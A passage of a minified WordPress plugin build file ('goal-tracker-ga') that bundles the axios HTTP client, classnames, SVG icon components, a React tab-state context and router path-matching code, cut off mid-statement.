Current File : /home/quantums/durdanatariq.com/wp-content/plugins/goal-tracker-ga/apps/basic/build/index.js
(()=>{var e,t,r={431:(e,t,r)=>{const a=r(196),i=a.forwardRef((function(e,t){return a.createElement("svg",Object.assign({xmlns:"http://www.w3.org/2000/svg",viewBox:"0 0 20 20",fill:"currentColor","aria-hidden":"true",ref:t},e),a.createElement("path",{fillRule:"evenodd",d:"M10.293 3.293a1 1 0 011.414 0l6 6a1 1 0 010 1.414l-6 6a1 1 0 01-1.414-1.414L14.586 11H3a1 1 0 110-2h11.586l-4.293-4.293a1 1 0 010-1.414z",clipRule:"evenodd"}))}));e.exports=i},977:(e,t,r)=>{const a=r(196),i=a.forwardRef((function(e,t){return a.createElement("svg",Object.assign({xmlns:"http://www.w3.org/2000/svg",viewBox:"0 0 20 20",fill:"currentColor","aria-hidden":"true",ref:t},e),a.createElement("path",{fillRule:"evenodd",d:"M18 10a8 8 0 11-16 0 8 8 0 0116 0zm-8-3a1 1 0 00-.867.5 1 1 0 11-1.731-1A3 3 0 0113 8a3.001 3.001 0 01-2 2.83V11a1 1 0 11-2 0v-1a1 1 0 011-1 1 1 0 100-2zm0 8a1 1 0 100-2 1 1 0 000 2z",clipRule:"evenodd"}))}));e.exports=i},644:(e,t,r)=>{e.exports=r(308)},353:(e,t,r)=>{"use strict";var a=r(44),i=r(955),n=r(233),u=r(30),s=r(948),l=r(875),o=r(842),c=r(618),L=r(560),M=r(714);e.exports=function(e){return new Promise((function(t,r){var d,j=e.data,m=e.headers,N=e.responseType;function y(){e.cancelToken&&e.cancelToken.unsubscribe(d),e.signal&&e.signal.removeEventListener("abort",d)}a.isFormData(j)&&delete m["Content-Type"];var p=new XMLHttpRequest;if(e.auth){var g=e.auth.username||"",x=e.auth.password?unescape(encodeURIComponent(e.auth.password)):"";m.Authorization="Basic "+btoa(g+":"+x)}var w=s(e.baseURL,e.url);function T(){if(p){var a="getAllResponseHeaders"in p?l(p.getAllResponseHeaders()):null,n={data:N&&"text"!==N&&"json"!==N?p.response:p.responseText,status:p.status,statusText:p.statusText,headers:a,config:e,request:p};i((function(e){t(e),y()}),(function(e){r(e),y()}),n),p=null}}if(p.open(e.method.toUpperCase(),u(w,e.params,e.paramsSerializer),!0),p.timeout=e.timeout,"onloadend"in p?p.onloadend=T:p.onreadystatechange=function(){p&&4===p.readyState&&(0!==p.status||p.responseURL&&0===p.responseURL.indexOf("file:"))&&setTimeout(T)},p.onabort=function(){p&&(r(c("Request aborted",e,"ECONNABORTED",p)),p=null)},p.onerror=function(){r(c("Network Error",e,null,p)),p=null},p.ontimeout=function(){var t=e.timeout?"timeout of "+e.timeout+"ms exceeded":"timeout exceeded",a=e.transitional||L;e.timeoutErrorMessage&&(t=e.timeoutErrorMessage),r(c(t,e,a.clarifyTimeoutError?"ETIMEDOUT":"ECONNABORTED",p)),p=null},a.isStandardBrowserEnv()){var E=(e.withCredentials||o(w))&&e.xsrfCookieName?n.read(e.xsrfCookieName):void 0;E&&(m[e.xsrfHeaderName]=E)}"setRequestHeader"in p&&a.forEach(m,(function(e,t){void 0===j&&"content-type"===t.toLowerCase()?delete m[t]:p.setRequestHeader(t,e)})),a.isUndefined(e.withCredentials)||(p.withCredentials=!!e.withCredentials),N&&"json"!==N&&(p.responseType=e.responseType),"function"==typeof e.onDownloadProgress&&p.addEventListener("progress",e.onDownloadProgress),"function"==typeof e.onUploadProgress&&p.upload&&p.upload.addEventListener("progress",e.onUploadProgress),(e.cancelToken||e.signal)&&(d=function(e){p&&(r(!e||e&&e.type?new M("canceled"):e),p.abort(),p=null)},e.cancelToken&&e.cancelToken.subscribe(d),e.signal&&(e.signal.aborted?d():e.signal.addEventListener("abort",d))),j||(j=null),p.send(j)}))}},308:(e,t,r)=>{"use strict";var a=r(44),i=r(95),n=r(215),u=r(937),s=function e(t){var r=new n(t),s=i(n.prototype.request,r);return a.extend(s,n.prototype,r),a.extend(s,r),s.create=function(r){return e(u(t,r))},s}(r(663));s.Axios=n,s.Cancel=r(714),s.CancelToken=r(89),s.isCancel=r(41),s.VERSION=r(241).version,s.all=function(e){return Promise.all(e)},s.spread=r(783),s.isAxiosError=r(587),e.exports=s,e.exports.default=s},714:e=>{"use strict";function t(e){this.message=e}t.prototype.toString=function(){return"Cancel"+(this.message?": "+this.message:"")},t.prototype.__CANCEL__=!0,e.exports=t},89:(e,t,r)=>{"use strict";var a=r(714);function i(e){if("function"!=typeof e)throw new TypeError("executor must be a function.");var t;this.promise=new Promise((function(e){t=e}));var r=this;this.promise.then((function(e){if(r._listeners){var t,a=r._listeners.length;for(t=0;t<a;t++)r._listeners[t](e);r._listeners=null}})),this.promise.then=function(e){var t,a=new Promise((function(e){r.subscribe(e),t=e})).then(e);return a.cancel=function(){r.unsubscribe(t)},a},e((function(e){r.reason||(r.reason=new a(e),t(r.reason))}))}i.prototype.throwIfRequested=function(){if(this.reason)throw this.reason},i.prototype.subscribe=function(e){this.reason?e(this.reason):this._listeners?this._listeners.push(e):this._listeners=[e]},i.prototype.unsubscribe=function(e){if(this._listeners){var t=this._listeners.indexOf(e);-1!==t&&this._listeners.splice(t,1)}},i.source=function(){var e;return{token:new i((function(t){e=t})),cancel:e}},e.exports=i},41:e=>{"use strict";e.exports=function(e){return!(!e||!e.__CANCEL__)}},215:(e,t,r)=>{"use strict";var a=r(44),i=r(30),n=r(946),u=r(895),s=r(937),l=r(525),o=l.validators;function c(e){this.defaults=e,this.interceptors={request:new n,response:new n}}c.prototype.request=function(e,t){"string"==typeof e?(t=t||{}).url=e:t=e||{},(t=s(this.defaults,t)).method?t.method=t.method.toLowerCase():this.defaults.method?t.method=this.defaults.method.toLowerCase():t.method="get";var r=t.transitional;void 0!==r&&l.assertOptions(r,{silentJSONParsing:o.transitional(o.boolean),forcedJSONParsing:o.transitional(o.boolean),clarifyTimeoutError:o.transitional(o.boolean)},!1);var a=[],i=!0;this.interceptors.request.forEach((function(e){"function"==typeof e.runWhen&&!1===e.runWhen(t)||(i=i&&e.synchronous,a.unshift(e.fulfilled,e.rejected))}));var n,c=[];if(this.interceptors.response.forEach((function(e){c.push(e.fulfilled,e.rejected)})),!i){var L=[u,void 0];for(Array.prototype.unshift.apply(L,a),L=L.concat(c),n=Promise.resolve(t);L.length;)n=n.then(L.shift(),L.shift());return n}for(var M=t;a.length;){var d=a.shift(),j=a.shift();try{M=d(M)}catch(e){j(e);break}}try{n=u(M)}catch(e){return Promise.reject(e)}for(;c.length;)n=n.then(c.shift(),c.shift());return n},c.prototype.getUri=function(e){return e=s(this.defaults,e),i(e.url,e.params,e.paramsSerializer).replace(/^\?/,"")},a.forEach(["delete","get","head","options"],(function(e){c.prototype[e]=function(t,r){return this.request(s(r||{},{method:e,url:t,data:(r||{}).data}))}})),a.forEach(["post","put","patch"],(function(e){c.prototype[e]=function(t,r,a){return this.request(s(a||{},{method:e,url:t,data:r}))}})),e.exports=c},946:(e,t,r)=>{"use strict";var a=r(44);function i(){this.handlers=[]}i.prototype.use=function(e,t,r){return this.handlers.push({fulfilled:e,rejected:t,synchronous:!!r&&r.synchronous,runWhen:r?r.runWhen:null}),this.handlers.length-1},i.prototype.eject=function(e){this.handlers[e]&&(this.handlers[e]=null)},i.prototype.forEach=function(e){a.forEach(this.handlers,(function(t){null!==t&&e(t)}))},e.exports=i},948:(e,t,r)=>{"use strict";var a=r(192),i=r(762);e.exports=function(e,t){return e&&!a(t)?i(e,t):t}},618:(e,t,r)=>{"use strict";var a=r(935);e.exports=function(e,t,r,i,n){var u=new Error(e);return a(u,t,r,i,n)}},895:(e,t,r)=>{"use strict";var a=r(44),i=r(556),n=r(41),u=r(663),s=r(714);function l(e){if(e.cancelToken&&e.cancelToken.throwIfRequested(),e.signal&&e.signal.aborted)throw new s("canceled")}e.exports=function(e){return l(e),e.headers=e.headers||{},e.data=i.call(e,e.data,e.headers,e.transformRequest),e.headers=a.merge(e.headers.common||{},e.headers[e.method]||{},e.headers),a.forEach(["delete","get","head","post","put","patch","common"],(function(t){delete e.headers[t]})),(e.adapter||u.adapter)(e).then((function(t){return l(e),t.data=i.call(e,t.data,t.headers,e.transformResponse),t}),(function(t){return n(t)||(l(e),t&&t.response&&(t.response.data=i.call(e,t.response.data,t.response.headers,e.transformResponse))),Promise.reject(t)}))}},935:e=>{"use strict";e.exports=function(e,t,r,a,i){return e.config=t,r&&(e.code=r),e.request=a,e.response=i,e.isAxiosError=!0,e.toJSON=function(){return{message:this.message,name:this.name,description:this.description,number:this.number,fileName:this.fileName,lineNumber:this.lineNumber,columnNumber:this.columnNumber,stack:this.stack,config:this.config,code:this.code,status:this.response&&this.response.status?this.response.status:null}},e}},937:(e,t,r)=>{"use strict";var a=r(44);e.exports=function(e,t){t=t||{};var r={};function i(e,t){return a.isPlainObject(e)&&a.isPlainObject(t)?a.merge(e,t):a.isPlainObject(t)?a.merge({},t):a.isArray(t)?t.slice():t}function n(r){return a.isUndefined(t[r])?a.isUndefined(e[r])?void 0:i(void 0,e[r]):i(e[r],t[r])}function u(e){if(!a.isUndefined(t[e]))return i(void 0,t[e])}function s(r){return a.isUndefined(t[r])?a.isUndefined(e[r])?void 0:i(void 0,e[r]):i(void 0,t[r])}function l(r){return r in t?i(e[r],t[r]):r in e?i(void 0,e[r]):void 0}var o={url:u,method:u,data:u,baseURL:s,transformRequest:s,transformResponse:s,paramsSerializer:s,timeout:s,timeoutMessage:s,withCredentials:s,adapter:s,responseType:s,xsrfCookieName:s,xsrfHeaderName:s,onUploadProgress:s,onDownloadProgress:s,decompress:s,maxContentLength:s,maxBodyLength:s,transport:s,httpAgent:s,httpsAgent:s,cancelToken:s,socketPath:s,responseEncoding:s,validateStatus:l};return a.forEach(Object.keys(e).concat(Object.keys(t)),(function(e){var t=o[e]||n,i=t(e);a.isUndefined(i)&&t!==l||(r[e]=i)})),r}},955:(e,t,r)=>{"use strict";var a=r(618);e.exports=function(e,t,r){var i=r.config.validateStatus;r.status&&i&&!i(r.status)?t(a("Request failed with status code "+r.status,r.config,null,r.request,r)):e(r)}},556:(e,t,r)=>{"use strict";var a=r(44),i=r(663);e.exports=function(e,t,r){var n=this||i;return a.forEach(r,(function(r){e=r.call(n,e,t)})),e}},663:(e,t,r)=>{"use strict";var a=r(44),i=r(868),n=r(935),u=r(560),s={"Content-Type":"application/x-www-form-urlencoded"};function l(e,t){!a.isUndefined(e)&&a.isUndefined(e["Content-Type"])&&(e["Content-Type"]=t)}var o,c={transitional:u,adapter:(("undefined"!=typeof XMLHttpRequest||"undefined"!=typeof process&&"[object process]"===Object.prototype.toString.call(process))&&(o=r(353)),o),transformRequest:[function(e,t){return i(t,"Accept"),i(t,"Content-Type"),a.isFormData(e)||a.isArrayBuffer(e)||a.isBuffer(e)||a.isStream(e)||a.isFile(e)||a.isBlob(e)?e:a.isArrayBufferView(e)?e.buffer:a.isURLSearchParams(e)?(l(t,"application/x-www-form-urlencoded;charset=utf-8"),e.toString()):a.isObject(e)||t&&"application/json"===t["Content-Type"]?(l(t,"application/json"),function(e,t,r){if(a.isString(e))try{return(0,JSON.parse)(e),a.trim(e)}catch(e){if("SyntaxError"!==e.name)throw e}return(0,JSON.stringify)(e)}(e)):e}],transformResponse:[function(e){var t=this.transitional||c.transitional,r=t&&t.silentJSONParsing,i=t&&t.forcedJSONParsing,u=!r&&"json"===this.responseType;if(u||i&&a.isString(e)&&e.length)try{return JSON.parse(e)}catch(e){if(u){if("SyntaxError"===e.name)throw n(e,this,"E_JSON_PARSE");throw e}}return e}],timeout:0,xsrfCookieName:"XSRF-TOKEN",xsrfHeaderName:"X-XSRF-TOKEN",maxContentLength:-1,maxBodyLength:-1,validateStatus:function(e){return e>=200&&e<300},headers:{common:{Accept:"application/json, text/plain, */*"}}};a.forEach(["delete","get","head"],(function(e){c.headers[e]={}})),a.forEach(["post","put","patch"],(function(e){c.headers[e]=a.merge(s)})),e.exports=c},560:e=>{"use strict";e.exports={silentJSONParsing:!0,forcedJSONParsing:!0,clarifyTimeoutError:!1}},241:e=>{e.exports={version:"0.26.1"}},95:e=>{"use strict";e.exports=function(e,t){return function(){for(var r=new Array(arguments.length),a=0;a<r.length;a++)r[a]=arguments[a];return e.apply(t,r)}}},30:(e,t,r)=>{"use strict";var a=r(44);function i(e){return encodeURIComponent(e).replace(/%3A/gi,":").replace(/%24/g,"$").replace(/%2C/gi,",").replace(/%20/g,"+").replace(/%5B/gi,"[").replace(/%5D/gi,"]")}e.exports=function(e,t,r){if(!t)return e;var n;if(r)n=r(t);else if(a.isURLSearchParams(t))n=t.toString();else{var u=[];a.forEach(t,(function(e,t){null!=e&&(a.isArray(e)?t+="[]":e=[e],a.forEach(e,(function(e){a.isDate(e)?e=e.toISOString():a.isObject(e)&&(e=JSON.stringify(e)),u.push(i(t)+"="+i(e))})))})),n=u.join("&")}if(n){var s=e.indexOf("#");-1!==s&&(e=e.slice(0,s)),e+=(-1===e.indexOf("?")?"?":"&")+n}return e}},762:e=>{"use strict";e.exports=function(e,t){return t?e.replace(/\/+$/,"")+"/"+t.replace(/^\/+/,""):e}},233:(e,t,r)=>{"use strict";var a=r(44);e.exports=a.isStandardBrowserEnv()?{write:function(e,t,r,i,n,u){var s=[];s.push(e+"="+encodeURIComponent(t)),a.isNumber(r)&&s.push("expires="+new Date(r).toGMTString()),a.isString(i)&&s.push("path="+i),a.isString(n)&&s.push("domain="+n),!0===u&&s.push("secure"),document.cookie=s.join("; ")},read:function(e){var t=document.cookie.match(new RegExp("(^|;\\s*)("+e+")=([^;]*)"));return t?decodeURIComponent(t[3]):null},remove:function(e){this.write(e,"",Date.now()-864e5)}}:{write:function(){},read:function(){return null},remove:function(){}}},192:e=>{"use strict";e.exports=function(e){return/^([a-z][a-z\d+\-.]*:)?\/\//i.test(e)}},587:(e,t,r)=>{"use strict";var a=r(44);e.exports=function(e){return a.isObject(e)&&!0===e.isAxiosError}},842:(e,t,r)=>{"use strict";var a=r(44);e.exports=a.isStandardBrowserEnv()?function(){var e,t=/(msie|trident)/i.test(navigator.userAgent),r=document.createElement("a");function i(e){var a=e;return t&&(r.setAttribute("href",a),a=r.href),r.setAttribute("href",a),{href:r.href,protocol:r.protocol?r.protocol.replace(/:$/,""):"",host:r.host,search:r.search?r.search.replace(/^\?/,""):"",hash:r.hash?r.hash.replace(/^#/,""):"",hostname:r.hostname,port:r.port,pathname:"/"===r.pathname.charAt(0)?r.pathname:"/"+r.pathname}}return e=i(window.location.href),function(t){var r=a.isString(t)?i(t):t;return r.protocol===e.protocol&&r.host===e.host}}():function(){return!0}},868:(e,t,r)=>{"use strict";var a=r(44);e.exports=function(e,t){a.forEach(e,(function(r,a){a!==t&&a.toUpperCase()===t.toUpperCase()&&(e[t]=r,delete e[a])}))}},875:(e,t,r)=>{"use strict";var a=r(44),i=["age","authorization","content-length","content-type","etag","expires","from","host","if-modified-since","if-unmodified-since","last-modified","location","max-forwards","proxy-authorization","referer","retry-after","user-agent"];e.exports=function(e){var t,r,n,u={};return e?(a.forEach(e.split("\n"),(function(e){if(n=e.indexOf(":"),t=a.trim(e.substr(0,n)).toLowerCase(),r=a.trim(e.substr(n+1)),t){if(u[t]&&i.indexOf(t)>=0)return;u[t]="set-cookie"===t?(u[t]?u[t]:[]).concat([r]):u[t]?u[t]+", "+r:r}})),u):u}},783:e=>{"use strict";e.exports=function(e){return function(t){return e.apply(null,t)}}},525:(e,t,r)=>{"use strict";var a=r(241).version,i={};["object","boolean","number","function","string","symbol"].forEach((function(e,t){i[e]=function(r){return typeof r===e||"a"+(t<1?"n ":" ")+e}}));var n={};i.transitional=function(e,t,r){function i(e,t){return"[Axios v"+a+"] Transitional option '"+e+"'"+t+(r?". "+r:"")}return function(r,a,u){if(!1===e)throw new Error(i(a," has been removed"+(t?" in "+t:"")));return t&&!n[a]&&(n[a]=!0,console.warn(i(a," has been deprecated since v"+t+" and will be removed in the near future"))),!e||e(r,a,u)}},e.exports={assertOptions:function(e,t,r){if("object"!=typeof e)throw new TypeError("options must be an object");for(var a=Object.keys(e),i=a.length;i-- >0;){var n=a[i],u=t[n];if(u){var s=e[n],l=void 0===s||u(s,n,e);if(!0!==l)throw new TypeError("option "+n+" must be "+l)}else if(!0!==r)throw Error("Unknown option "+n)}},validators:i}},44:(e,t,r)=>{"use strict";var a=r(95),i=Object.prototype.toString;function n(e){return Array.isArray(e)}function u(e){return void 0===e}function s(e){return"[object ArrayBuffer]"===i.call(e)}function l(e){return null!==e&&"object"==typeof e}function o(e){if("[object Object]"!==i.call(e))return!1;var t=Object.getPrototypeOf(e);return null===t||t===Object.prototype}function c(e){return"[object Function]"===i.call(e)}function L(e,t){if(null!=e)if("object"!=typeof e&&(e=[e]),n(e))for(var r=0,a=e.length;r<a;r++)t.call(null,e[r],r,e);else for(var i in e)Object.prototype.hasOwnProperty.call(e,i)&&t.call(null,e[i],i,e)}e.exports={isArray:n,isArrayBuffer:s,isBuffer:function(e){return null!==e&&!u(e)&&null!==e.constructor&&!u(e.constructor)&&"function"==typeof e.constructor.isBuffer&&e.constructor.isBuffer(e)},isFormData:function(e){return"[object FormData]"===i.call(e)},isArrayBufferView:function(e){return"undefined"!=typeof ArrayBuffer&&ArrayBuffer.isView?ArrayBuffer.isView(e):e&&e.buffer&&s(e.buffer)},isString:function(e){return"string"==typeof e},isNumber:function(e){return"number"==typeof e},isObject:l,isPlainObject:o,isUndefined:u,isDate:function(e){return"[object Date]"===i.call(e)},isFile:function(e){return"[object File]"===i.call(e)},isBlob:function(e){return"[object Blob]"===i.call(e)},isFunction:c,isStream:function(e){return l(e)&&c(e.pipe)},isURLSearchParams:function(e){return"[object URLSearchParams]"===i.call(e)},isStandardBrowserEnv:function(){return("undefined"==typeof navigator||"ReactNative"!==navigator.product&&"NativeScript"!==navigator.product&&"NS"!==navigator.product)&&"undefined"!=typeof window&&"undefined"!=typeof document},forEach:L,merge:function e(){var t={};function r(r,a){o(t[a])&&o(r)?t[a]=e(t[a],r):o(r)?t[a]=e({},r):n(r)?t[a]=r.slice():t[a]=r}for(var a=0,i=arguments.length;a<i;a++)L(arguments[a],r);return t},extend:function(e,t,r){return L(t,(function(t,i){e[i]=r&&"function"==typeof t?a(t,r):t})),e},trim:function(e){return e.trim?e.trim():e.replace(/^\s+|\s+$/g,"")},stripBOM:function(e){return 65279===e.charCodeAt(0)&&(e=e.slice(1)),e}}},779:(e,t)=>{var r;!function(){"use strict";var a={}.hasOwnProperty;function i(){for(var e=[],t=0;t<arguments.length;t++){var r=arguments[t];if(r){var n=typeof r;if("string"===n||"number"===n)e.push(r);else if(Array.isArray(r)){if(r.length){var u=i.apply(null,r);u&&e.push(u)}}else if("object"===n){if(r.toString!==Object.prototype.toString&&!r.toString.toString().includes("[native code]")){e.push(r.toString());continue}for(var s in r)a.call(r,s)&&r[s]&&e.push(s)}}}return e.join(" ")}e.exports?(i.default=i,e.exports=i):void 0===(r=function(){return i}.apply(t,[]))||(e.exports=r)}()},29:(e,t,r)=>{"use strict";var a=r(850);t.s=a.createRoot,a.hydrateRoot},196:e=>{"use strict";e.exports=window.React},850:e=>{"use strict";e.exports=window.ReactDOM}},a={};function i(e){var t=a[e];if(void 0!==t)return t.exports;var n=a[e]={exports:{}};return r[e](n,n.exports,i),n.exports}i.n=e=>{var t=e&&e.__esModule?()=>e.default:()=>e;return i.d(t,{a:t}),t},t=Object.getPrototypeOf?e=>Object.getPrototypeOf(e):e=>e.__proto__,i.t=function(r,a){if(1&a&&(r=this(r)),8&a)return r;if("object"==typeof r&&r){if(4&a&&r.__esModule)return r;if(16&a&&"function"==typeof r.then)return r}var n=Object.create(null);i.r(n);var u={};e=e||[null,t({}),t([]),t(t)];for(var s=2&a&&r;"object"==typeof s&&!~e.indexOf(s);s=t(s))Object.getOwnPropertyNames(s).forEach((e=>u[e]=()=>r[e]));return u.default=()=>r,i.d(n,u),n},i.d=(e,t)=>{for(var r in t)i.o(t,r)&&!i.o(e,r)&&Object.defineProperty(e,r,{enumerable:!0,get:t[r]})},i.g=function(){if("object"==typeof globalThis)return globalThis;try{return this||new Function("return this")()}catch(e){if("object"==typeof window)return window}}(),i.o=(e,t)=>Object.prototype.hasOwnProperty.call(e,t),i.r=e=>{"undefined"!=typeof Symbol&&Symbol.toStringTag&&Object.defineProperty(e,Symbol.toStringTag,{value:"Module"}),Object.defineProperty(e,"__esModule",{value:!0})},(()=>{var e;i.g.importScripts&&(e=i.g.location+"");var t=i.g.document;if(!e&&t&&(t.currentScript&&(e=t.currentScript.src),!e)){var r=t.getElementsByTagName("script");r.length&&(e=r[r.length-1].src)}if(!e)throw new Error("Automatic publicPath is not supported in this browser");e=e.replace(/#.*$/,"").replace(/\?.*$/,"").replace(/\/[^\/]+$/,"/"),i.p=e})(),(()=>{"use strict";const e=window.wp.element;var t=i(29),r=i(196),a=i.t(r,2),n=i.n(r);const u=r.forwardRef((function(e,t){return r.createElement("svg",Object.assign({xmlns:"http://www.w3.org/2000/svg",viewBox:"0 0 20 20",fill:"currentColor","aria-hidden":"true",ref:t},e),r.createElement("path",{d:"M5 4a1 1 0 00-2 0v7.268a2 2 0 000 3.464V16a1 1 0 102 0v-1.268a2 2 0 000-3.464V4zM11 4a1 1 0 10-2 0v1.268a2 2 0 000 3.464V16a1 1 0 102 0V8.732a2 2 0 000-3.464V4zM16 3a1 1 0 011 1v7.268a2 2 0 010 3.464V16a1 1 0 11-2 0v-1.268a2 2 0 010-3.464V4a1 1 0 011-1z"}))})),s=r.forwardRef((function(e,t){return r.createElement("svg",Object.assign({xmlns:"http://www.w3.org/2000/svg",viewBox:"0 0 20 20",fill:"currentColor","aria-hidden":"true",ref:t},e),r.createElement("path",{fillRule:"evenodd",d:"M18 10a8 8 0 11-16 0 8 8 0 0116 0zm-8-3a1 1 0 00-.867.5 1 1 0 11-1.731-1A3 3 0 0113 8a3.001 3.001 0 01-2 2.83V11a1 1 0 11-2 0v-1a1 1 0 011-1 1 1 0 100-2zm0 8a1 1 0 100-2 1 1 0 000 2z",clipRule:"evenodd"}))}));var l=i(779),o=i.n(l);const c=(0,r.createContext)(null),L=t=>{let{initialTabs:a,children:i}=t;const n=(e=>{const[t,a]=(0,r.useState)(e);return{tabs:t,updateTab:(e,t)=>{a((r=>r.map(((r,a)=>a===e?{...r,...t}:r))))},updateTabByName:(e,t)=>{a((r=>r.map((r=>r.name===e?{...r,...t}:r))))},updateHasIssueByName:(e,t)=>{a((r=>r.map((r=>r.name===e?{...r,hasIssue:t}:r))))}}})(a);return(0,e.createElement)(c.Provider,{value:n},i)};function M(){return M=Object.assign?Object.assign.bind():function(e){for(var t=1;t<arguments.length;t++){var r=arguments[t];for(var a in r)Object.prototype.hasOwnProperty.call(r,a)&&(e[a]=r[a])}return e},M.apply(this,arguments)}var d;!function(e){e.Pop="POP",e.Push="PUSH",e.Replace="REPLACE"}(d||(d={}));const j="popstate";function m(e,t){if(!1===e||null==e)throw new Error(t)}function N(e,t){if(!e){"undefined"!=typeof console&&console.warn(t);try{throw new Error(t)}catch(e){}}}function y(e,t){return{usr:e.state,key:e.key,idx:t}}function p(e,t,r,a){return void 0===r&&(r=null),M({pathname:"string"==typeof e?e:e.pathname,search:"",hash:""},"string"==typeof t?x(t):t,{state:r,key:t&&t.key||a||Math.random().toString(36).substr(2,8)})}function g(e){let{pathname:t="/",search:r="",hash:a=""}=e;return r&&"?"!==r&&(t+="?"===r.charAt(0)?r:"?"+r),a&&"#"!==a&&(t+="#"===a.charAt(0)?a:"#"+a),t}function x(e){let t={};if(e){let r=e.indexOf("#");r>=0&&(t.hash=e.substr(r),e=e.substr(0,r));let a=e.indexOf("?");a>=0&&(t.search=e.substr(a),e=e.substr(0,a)),e&&(t.pathname=e)}return t}var w;function T(e,t,r){void 0===r&&(r="/");let a=Y(("string"==typeof t?x(t):t).pathname||"/",r);if(null==a)return null;let i=E(e);!function(e){e.sort(((e,t)=>e.score!==t.score?t.score-e.score:function(e,t){let r=e.length===t.length&&e.slice(0,-1).every(((e,r)=>e===t[r]));return r?e[e.length-1]-t[t.length-1]:0}(e.routesMeta.map((e=>e.childrenIndex)),t.routesMeta.map((e=>e.childrenIndex)))))}(i);let n=null;for(let e=0;null==n&&e<i.length;++e)n=v(i[e],A(a));return n}function E(e,t,r,a){void 0===t&&(t=[]),void 0===r&&(r=[]),void 0===a&&(a="");let i=(e,i,n)=>{let u={relativePath:void 0===n?e.path||"":n,caseSensitive:!0===e.caseSensitive,childrenIndex:i,route:e};u.relativePath.startsWith("/")&&(m(u.relativePath.startsWith(a),'Absolute route path "'+u.relativePath+'" nested under path "'+a+'" is not valid. An absolute child route path must start with the combined path of all its parent routes.'),u.relativePath=u.relativePath.slice(a.length));let s=P([a,u.relativePath]),l=r.concat(u);e.children&&e.children.length>0&&(m(!0!==e.index,'Index routes must not have child routes. Please remove all child routes from route path "'+s+'".'),E(e.children,t,l,s)),(null!=e.path||e.index)&&t.push({path:s,score:O(s,e.index),routesMeta:l})};return e.forEach(((e,t)=>{var r;if(""!==e.path&&null!=(r=e.path)&&r.includes("?"))for(let r of S(e.path))i(e,t,r);else i(e,t)})),t}function S(e){let t=e.split("/");if(0===t.length)return[];let[r,...a]=t,i=r.endsWith("?"),n=r.replace(/\?$/,"");if(0===a.length)return i?[n,""]:[n];let u=S(a.join("/")),s=[];return s.push(...u.map((e=>""===e?n:[n,e].join("/")))),i&&s.push(...u),s.map((t=>e.startsWith("/")&&""===t?"/":t))}!function(e){e.data="data",e.deferred="deferred",e.redirect="redirect",e.error="error"}(w||(w={})),new Set(["lazy","caseSensitive","path","id","index","children"]);const D=/^:\w+$/,f=3,h=2,I=1,C=10,z=-2,b=e=>"*"===e;function O(e,t){let r=e.split("/"),a=r.length;return r.some(b)&&(a+=z),t&&(a+=h),r.filter((e=>!b(e))).reduce(((e,t)=>e+(D.test(t)?f:""===t?I:C)),a)}function v(e,t){let{routesMeta:r}=e,a={},i="/",n=[];for(let e=0;e<r.length;++e){let u=r[e],s=e===r.length-1,l="/"===i?t:t.slice(i.length)||"/",o=k({path:u.relativePath,caseSensitive:u.caseSensitive,end:s},l);if(!o)return null;Object.assign(a,o.params);let c=u.route;n.push({params:a,pathname:P([i,o.pathname]),pathnameBase:R(P([i,o.pathnameBase])),route:c}),"/"!==o.pathnameBase&&(i=P([i,o.pathnameBase]))}return n}function k(e,t){"string"==typeof e&&(e={path:e,caseSensitive:!1,end:!0});let[r,a]=function(e,t,r){void 0===t&&(t=!1),void 0===r&&(r=!0),N("*"===e||!e.endsWith("*")||e.endsWith("/*"),'Route path "'+e+'" will be treated as if it were "'+e.replace(/\*$/,"/*")+'" because the `*` character must always follow a `/` in the pattern. To get rid of this warning, please change the route path to "'+e.replace(/\*$/,"/*")+'".');let a=[],i="^"+e.replace(/\/*\*?$/,"").replace(/^\/*/,"/").replace(/[\\.*+^$?{}|()[\]]/g,"\\$&").replace(/\/:(\w+)/g,((e,t)=>(a.push(t),"/([^\\/]+)")));return e.endsWith("*")?(a.push("*"),i+="*"===e||"/*"===e?"(.*)$":"(?:\\/(.+)|\\/*)$"):r?i+="\\/*$":""!==e&&"/"!==e&&(i+="(?:(?=\\/|$))"),[new RegExp(i,t?void 0:"i"),a]}(e.path,e.caseSensitive,e.end),i=t.match(r);if(!i)return null;let n=i[0],u=n.replace(/(.)\/+$/,"$1"),s=i.slice(1);return{params:a.reduce(((e,t,r)=>{if("*"===t){let e=s[r]||"";u=n.slice(0,n.length-e.length).replace(/(.)\/+$/,"$1")}return e[t]=function(e,t){try{return decodeURIComponent(e)}catch(r){return N(!1,'The value for the URL param "'+t+'" will not be decoded because the string "'+e+'" is a malformed URL segment. This is probably due to a bad percent encoding ('+r+")."),e}}(s[r]||"",t),e}),{}),pathname:n,pathnameBase:u,pattern:e}}function A(e){try{return decodeURI(e)}catch(t){return N(!1,'The URL path "'+e+'" could not be decoded because it is is a malformed URL segment. This is probably due to a bad percent encoding ('+t+")."),e}}function Y(e,t){if("/"===t)return e;if(!e.toLowerCase().startsWith(t.toLowerCase()))return null;let r=t.endsWith("/")?t.length-1:t.length,a=e.charAt(r);return a&&"/"!==a?null:e.slice(r)||"/"}function U(e,t,r,a){return"Cannot include a '"+e+"' character in a manually specified `to."+t+"` field ["+JSON.stringify(a)+"].  Please separate it out to the `to."+r+'` field. Alternatively you may provide the full path as a string in <Link to="..."> and the router will parse it for you.'}function Q(e){return e.filter(((e,t)=>0===t||e.route.path&&e.route.path.length>0))}function G(e,t,r,a){let i;void 0===a&&(a=!1),"string"==typeof e?i=x(e):(i=M({},e),m(!i.pathname||!i.pathname.includes("?"),U("?","pathname","search",i)),m(!i.pathname||!i.pathname.includes("#"),U("#","pathname","hash",i)),m(!i.search||!i.search.includes("#"),U("#","search","hash",i)));let n,u=""===e||""===i.pathname,s=u?"/":i.pathname;if(a||null==s)n=r;else{let e=t.length-1;if(s.startsWith("..")){let t=s.split("/");for(;".."===t[0];)t.shift(),e-=1;i.pathname=t.join("/")}n=e>=0?t[e]:"/"}let l=function(e,t){void 0===t&&(t="/");let{pathname:r,search:a="",hash:i=""}="string"==typeof e?x(e):e,n=r?r.startsWith("/")?r:function(e,t){let r=t.replace(/\/+$/,"").split("/");return e.split("/").forEach((e=>{".."===e?r.length>1&&r.pop():"."!==e&&r.push(e)})),r.length>1?r.join("/"):"/"}(r,t):t;return{pathname:n,search:F(a),hash:_(i)}}(i,n),o=s&&"/"!==s&&s.endsWith("/"),c=(u||"."===s)&&r.endsWith("/");return l.pathname.endsWith("/")||!o&&!c||(l.pathname+="/"),l}const 